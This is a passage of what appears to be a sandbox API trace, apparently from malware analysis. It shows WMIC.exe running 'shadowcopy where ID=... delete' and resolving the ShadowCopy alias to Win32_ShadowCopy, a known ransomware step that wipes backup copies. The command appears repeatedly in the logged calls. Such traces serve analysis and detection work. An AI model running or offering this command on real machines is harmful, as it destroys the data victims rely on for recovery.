(param_1="texttablewsys.xsl") returned 0x11 [0125.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.171] malloc (_Size=0x30) returned 0x2884c0 [0125.171] malloc (_Size=0x18) returned 0x28c9a0 [0125.171] free (_Block=0x28c9a0) [0125.171] malloc (_Size=0x18) returned 0x28c9a0 [0125.171] malloc (_Size=0x18) returned 0x28c9c0 [0125.171] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.171] SysStringLen (param_1="TABLE") returned 0x5 [0125.171] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.171] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.171] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.171] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.171] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.171] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.172] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.172] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.172] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.172] malloc (_Size=0x30) returned 0x288500 [0125.172] malloc (_Size=0x18) returned 0x28c9e0 [0125.172] free (_Block=0x28c9e0) [0125.172] malloc (_Size=0x18) returned 0x28c9e0 [0125.172] malloc (_Size=0x18) returned 0x28ca00 [0125.172] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.172] SysStringLen (param_1="TABLE") returned 0x5 [0125.172] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.172] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.172] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.172] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.172] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.172] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.172] malloc (_Size=0x30) returned 0x288540 [0125.173] malloc (_Size=0x18) returned 0x28ca20 [0125.173] free (_Block=0x28ca20) [0125.173] malloc (_Size=0x18) returned 0x28ca20 [0125.173] malloc (_Size=0x18) returned 0x28ca40 [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] SysStringLen (param_1="TABLE") returned 0x5 [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.173] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.173] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.173] malloc (_Size=0x30) returned 0x288580 [0125.173] FreeThreadedDOMDocument:IUnknown:Release (This=0x1d71d0) returned 0x0 [0125.173] free (_Block=0x286e90) [0125.174] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" [0125.174] malloc (_Size=0xe0) returned 0x28cd30 [0125.174] memcpy_s (in: _Destination=0x28cd30, _DestinationSize=0xde, _Source=0x3025be, _SourceSize=0xd0 | out: _Destination=0x28cd30) returned 0x0 [0125.174] malloc (_Size=0x18) returned 0x28ca60 [0125.174] malloc (_Size=0x18) returned 0x28ca80 [0125.174] malloc (_Size=0x18) returned 0x28caa0 [0125.174] malloc (_Size=0x18) returned 0x28cac0 [0125.174] malloc (_Size=0x80) returned 0x286e90 [0125.174] GetLocalTime (in: lpSystemTime=0x1cf850 | out: lpSystemTime=0x1cf850*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x1d, wMilliseconds=0x1d6)) [0125.174] _vsnwprintf (in: _Buffer=0x286e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cf7a8 | out: _Buffer="09-04-2020T08:55:29") returned 19 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] malloc (_Size=0x90) returned 0x2870a0 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] malloc (_Size=0x90) returned 0x28ce20 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.174] malloc (_Size=0x16) returned 0x28cae0 [0125.174] lstrlenW (lpString="shadowcopy") returned 10 [0125.174] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0125.174] malloc (_Size=0x16) returned 0x28cb00 [0125.174] malloc (_Size=0x8) returned 0x287140 [0125.174] free (_Block=0x0) [0125.174] free (_Block=0x28cae0) [0125.175] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.175] malloc (_Size=0xc) returned 0x28cae0 [0125.175] lstrlenW (lpString="where") returned 5 [0125.175] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0125.175] malloc (_Size=0xc) returned 0x28cb20 [0125.175] malloc (_Size=0x10) returned 0x28cb40 [0125.175] memmove_s (in: _Destination=0x28cb40, _DestinationSize=0x8, _Source=0x287140, _SourceSize=0x8 | out: _Destination=0x28cb40) returned 0x0 [0125.175] free (_Block=0x287140) [0125.175] free (_Block=0x0) [0125.175] free (_Block=0x28cae0) [0125.175] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.175] malloc (_Size=0x5c) returned 0x28cec0 [0125.175] lstrlenW (lpString="\"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\"") returned 45 [0125.175] _wcsicmp (_String1="\"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\"", _String2="\"NULL\"") returned -5 [0125.175] lstrlenW (lpString="\"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\"") returned 45 [0125.175] lstrlenW (lpString="\"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\"") returned 45 [0125.175] malloc (_Size=0x5c) returned 0x28cf30 [0125.175] malloc (_Size=0x18) returned 0x28cae0 [0125.175] memmove_s (in: _Destination=0x28cae0, _DestinationSize=0x10, _Source=0x28cb40, _SourceSize=0x10 | out: _Destination=0x28cae0) returned 0x0 [0125.175] free (_Block=0x28cb40) [0125.175] free (_Block=0x0) [0125.175] free (_Block=0x28cec0) [0125.175] lstrlenW (lpString=" shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 71 [0125.175] malloc (_Size=0xe) returned 0x28cb40 [0125.175] lstrlenW (lpString="delete") returned 6 [0125.175] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0125.175] malloc (_Size=0xe) returned 0x28cb60 [0125.175] malloc (_Size=0x20) returned 0x28cec0 [0125.175] memmove_s (in: _Destination=0x28cec0, _DestinationSize=0x18, _Source=0x28cae0, _SourceSize=0x18 | out: _Destination=0x28cec0) returned 0x0 [0125.175] free (_Block=0x28cae0) [0125.175] free (_Block=0x0) [0125.175] free (_Block=0x28cb40) [0125.175] malloc (_Size=0x20) returned 0x28cef0 [0125.175] lstrlenW (lpString="QUIT") returned 4 [0125.175] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0125.176] lstrlenW (lpString="EXIT") returned 4 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0125.176] free (_Block=0x28cef0) [0125.176] WbemLocator:IUnknown:AddRef (This=0x1d91390) returned 0x2 [0125.176] malloc (_Size=0x20) returned 0x28cef0 [0125.176] lstrlenW (lpString="/") returned 1 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0125.176] lstrlenW (lpString="-") returned 1 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0125.176] lstrlenW (lpString="CLASS") returned 5 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0125.176] lstrlenW (lpString="PATH") returned 4 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0125.176] lstrlenW (lpString="CONTEXT") returned 7 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] malloc (_Size=0x16) returned 0x28cb40 [0125.176] lstrlenW (lpString="shadowcopy") returned 10 [0125.176] GetCurrentThreadId () returned 0xa10 [0125.176] ??0CHString@@QEAA@XZ () returned 0x1cf660 [0125.176] malloc (_Size=0x18) returned 0x28cae0 [0125.176] malloc (_Size=0x18) returned 0x28cb80 [0125.177] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d91390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffe62998 | out: ppNamespace=0xffe62998*=0x1da3a98) returned 0x0 [0125.189] free (_Block=0x28cb80) [0125.189] free (_Block=0x28cae0) [0125.189] CoSetProxyBlanket (pProxy=0x1da3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0125.190] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.190] GetCurrentThreadId () returned 0xa10 [0125.190] ??0CHString@@QEAA@XZ () returned 0x1cf4f8 [0125.190] malloc (_Size=0x18) returned 0x28cae0 [0125.190] malloc (_Size=0x18) returned 0x28cb80 [0125.190] malloc (_Size=0x18) returned 0x28cba0 [0125.190] malloc (_Size=0x18) returned 0x28cbc0 [0125.190] SysStringLen (param_1="root\\cli") returned 0x8 [0125.190] SysStringLen (param_1="\\") returned 0x1 [0125.190] malloc (_Size=0x18) returned 0x28cbe0 [0125.190] SysStringLen (param_1="root\\cli\\") returned 0x9 [0125.190] SysStringLen (param_1="ms_409") returned 0x6 [0125.190] free (_Block=0x28cbc0) [0125.190] free (_Block=0x28cba0) [0125.191] free (_Block=0x28cb80) [0125.191] free (_Block=0x28cae0) [0125.191] malloc (_Size=0x18) returned 0x28cae0 [0125.191] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d91390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffe629a0 | out: ppNamespace=0xffe629a0*=0x1da3b28) returned 0x0 [0125.193] free (_Block=0x28cae0) [0125.193] free (_Block=0x28cbe0) [0125.193] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.193] GetCurrentThreadId () returned 0xa10 [0125.193] ??0CHString@@QEAA@XZ () returned 0x1cf670 [0125.193] malloc (_Size=0x18) returned 0x28cbe0 [0125.194] malloc (_Size=0x18) returned 0x28cae0 [0125.194] malloc (_Size=0x18) returned 0x28cb80 [0125.194] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0125.194] malloc (_Size=0x3a) returned 0x28cfa0 [0125.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffdf1980, cbMultiByte=-1, lpWideCharStr=0x28cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0125.194] free (_Block=0x28cfa0) [0125.194] malloc (_Size=0x18) returned 0x28cba0 [0125.194] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0125.194] SysStringLen (param_1="shadowcopy") returned 0xa [0125.194] malloc (_Size=0x18) returned 0x28cbc0 [0125.194] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0125.194] SysStringLen (param_1="'") returned 0x1 [0125.194] free (_Block=0x28cba0) [0125.194] free (_Block=0x28cb80) [0125.194] free (_Block=0x28cae0) [0125.194] free (_Block=0x28cbe0) [0125.194] IWbemServices:GetObject (in: This=0x1da3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cf678*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf678*=0x1db04e0, ppCallResult=0x0) returned 0x0 [0125.199] malloc (_Size=0x18) returned 0x28cbe0 [0125.199] IWbemClassObject:Get (in: This=0x1db04e0, wszName="Target", lFlags=0, pVal=0x1cf5a0*(varType=0x0, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe62998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5a0*(varType=0x8, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.199] free (_Block=0x28cbe0) [0125.199] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.199] malloc (_Size=0x3e) returned 0x28cfa0 [0125.199] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.199] malloc (_Size=0x18) returned 0x28cbe0 [0125.199] IWbemClassObject:Get (in: This=0x1db04e0, wszName="PWhere", lFlags=0, pVal=0x1cf5a0*(varType=0x0, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1=0x32e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5a0*(varType=0x8, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.199] free (_Block=0x28cbe0) [0125.199] lstrlenW (lpString=" Where ID = '#'") returned 15 [0125.199] malloc (_Size=0x20) returned 0x28cff0 [0125.199] lstrlenW (lpString=" Where ID = '#'") returned 15 [0125.199] malloc (_Size=0x18) returned 0x28cbe0 [0125.200] IWbemClassObject:Get (in: This=0x1db04e0, wszName="Connection", lFlags=0, pVal=0x1cf5a0*(varType=0x0, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1=0x37bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5a0*(varType=0xd, wReserved1=0xffe6, wReserved2=0x0, wReserved3=0x0, varVal1=0x1db09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.200] free (_Block=0x28cbe0) [0125.200] IUnknown:QueryInterface (in: This=0x1db09c0, riid=0xffdf7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf590 | out: ppvObject=0x1cf590*=0x1db09c0) returned 0x0 [0125.200] GetCurrentThreadId () returned 0xa10 [0125.200] ??0CHString@@QEAA@XZ () returned 0x1cf4b8 [0125.200] malloc (_Size=0x18) returned 0x28cbe0 [0125.200] IWbemClassObject:Get (in: This=0x1db09c0, wszName="Namespace", lFlags=0, pVal=0x1cf4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe0738f, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.200] free (_Block=0x28cbe0) [0125.200] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0125.200] malloc (_Size=0x16) returned 0x28cbe0 [0125.200] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0125.200] malloc (_Size=0x18) returned 0x28cae0 [0125.200] IWbemClassObject:Get (in: This=0x1db09c0, wszName="Locale", lFlags=0, pVal=0x1cf4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.200] free (_Block=0x28cae0) [0125.200] lstrlenW (lpString="ms_409") returned 6 [0125.200] malloc (_Size=0xe) returned 0x28cae0 [0125.200] lstrlenW (lpString="ms_409") returned 6 [0125.200] malloc (_Size=0x18) returned 0x28cb80 [0125.200] IWbemClassObject:Get (in: This=0x1db09c0, wszName="User", lFlags=0, pVal=0x1cf4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.201] free (_Block=0x28cb80) [0125.201] malloc (_Size=0x18) returned 0x28cb80 [0125.201] IWbemClassObject:Get (in: This=0x1db09c0, wszName="Password", lFlags=0, pVal=0x1cf4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.201] free (_Block=0x28cb80) [0125.201] malloc (_Size=0x18) returned 0x28cb80 [0125.201] IWbemClassObject:Get (in: This=0x1db09c0, wszName="Server", lFlags=0, pVal=0x1cf4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.201] free (_Block=0x28cb80) [0125.201] lstrlenW (lpString=".") returned 1 [0125.201] malloc (_Size=0x4) returned 0x287140 [0125.201] lstrlenW (lpString=".") returned 1 [0125.201] malloc (_Size=0x18) returned 0x28cb80 [0125.201] IWbemClassObject:Get (in: This=0x1db09c0, wszName="Authority", lFlags=0, pVal=0x1cf4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0x28cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.201] free (_Block=0x28cb80) [0125.201] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.201] IUnknown:Release (This=0x1db09c0) returned 0x1 [0125.201] GetCurrentThreadId () returned 0xa10 [0125.201] ??0CHString@@QEAA@XZ () returned 0x1cf4b8 [0125.201] malloc (_Size=0x18) returned 0x28cb80 [0125.201] IWbemClassObject:Get (in: This=0x1db04e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3aa648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0125.202] free (_Block=0x28cb80) [0125.202] malloc (_Size=0x18) returned 0x28cb80 [0125.202] GetCurrentThreadId () returned 0xa10 [0125.202] ??0CHString@@QEAA@XZ () returned 0x1cf338 [0125.202] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf350 [0125.202] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf2e0 [0125.202] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0125.202] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x28d020 [0125.202] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0125.202] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf2a0 [0125.202] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf2e8 [0125.202] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf350 [0125.202] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0125.202] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0125.202] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf2a8 [0125.202] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf2e0 [0125.202] ??1CHString@@QEAA@XZ () returned 0x1 [0125.202] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x28d090 [0125.202] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0125.202] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf2a0 [0125.202] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf2e8 [0125.202] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf350 [0125.202] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0125.202] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0125.202] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf2a8 [0125.202] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf2e0 [0125.202] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.202] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0125.202] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.202] malloc (_Size=0x18) returned 0x28cba0 [0125.203] malloc (_Size=0x18) returned 0x28cc00 [0125.203] malloc (_Size=0x18) returned 0x28cc20 [0125.203] malloc (_Size=0x18) returned 0x28cc40 [0125.203] malloc (_Size=0x18) returned 0x28cc60 [0125.203] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0125.203] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0125.203] malloc (_Size=0x18) returned 0x28cc80 [0125.203] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0125.203] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0125.203] malloc (_Size=0x18) returned 0x28cca0 [0125.203] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0125.203] SysStringLen (param_1="\"") returned 0x1 [0125.203] free (_Block=0x28cc80) [0125.203] free (_Block=0x28cc60) [0125.203] free (_Block=0x28cc40) [0125.203] free (_Block=0x28cc20) [0125.203] free (_Block=0x28cc00) [0125.203] free (_Block=0x28cba0) [0125.204] IWbemServices:GetObject (in: This=0x1da3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf328*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf328*=0x1db0a50, ppCallResult=0x0) returned 0x0 [0125.204] malloc (_Size=0x18) returned 0x28cba0 [0125.204] IWbemClassObject:Get (in: This=0x1db0a50, wszName="Text", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe62ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a4aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x32e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0125.204] free (_Block=0x28cba0) [0125.204] SafeArrayGetLBound (in: psa=0x3a4aa0, nDim=0x1, plLbound=0x1cf340 | out: plLbound=0x1cf340) returned 0x0 [0125.204] SafeArrayGetUBound (in: psa=0x3a4aa0, nDim=0x1, plUbound=0x1cf330 | out: plUbound=0x1cf330) returned 0x0 [0125.204] SafeArrayGetElement (in: psa=0x3a4aa0, rgIndices=0x1cf324, pv=0x1cf378 | out: pv=0x1cf378) returned 0x0 [0125.204] malloc (_Size=0x18) returned 0x28cba0 [0125.204] malloc (_Size=0x18) returned 0x28cc00 [0125.204] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0125.205] free (_Block=0x28cba0) [0125.205] IUnknown:Release (This=0x1db0a50) returned 0x0 [0125.205] free (_Block=0x28cca0) [0125.205] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0125.205] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.205] free (_Block=0x28cb80) [0125.205] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.205] lstrlenW (lpString="Shadow copy management.") returned 23 [0125.205] malloc (_Size=0x30) returned 0x2885c0 [0125.205] lstrlenW (lpString="Shadow copy management.") returned 23 [0125.205] free (_Block=0x28cc00) [0125.205] IUnknown:Release (This=0x1db04e0) returned 0x0 [0125.205] free (_Block=0x28cbc0) [0125.205] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.205] lstrlenW (lpString="PATH") returned 4 [0125.205] lstrlenW (lpString="where") returned 5 [0125.205] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0125.205] lstrlenW (lpString="WHERE") returned 5 [0125.205] lstrlenW (lpString="where") returned 5 [0125.205] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0125.205] lstrlenW (lpString="/") returned 1 [0125.205] lstrlenW (lpString="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 43 [0125.205] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0125.205] lstrlenW (lpString="-") returned 1 [0125.205] lstrlenW (lpString="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 43 [0125.205] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0125.205] lstrlenW (lpString="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 43 [0125.206] malloc (_Size=0x58) returned 0x28d020 [0125.206] lstrlenW (lpString="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 43 [0125.206] lstrlenW (lpString="/") returned 1 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0125.206] lstrlenW (lpString="-") returned 1 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] 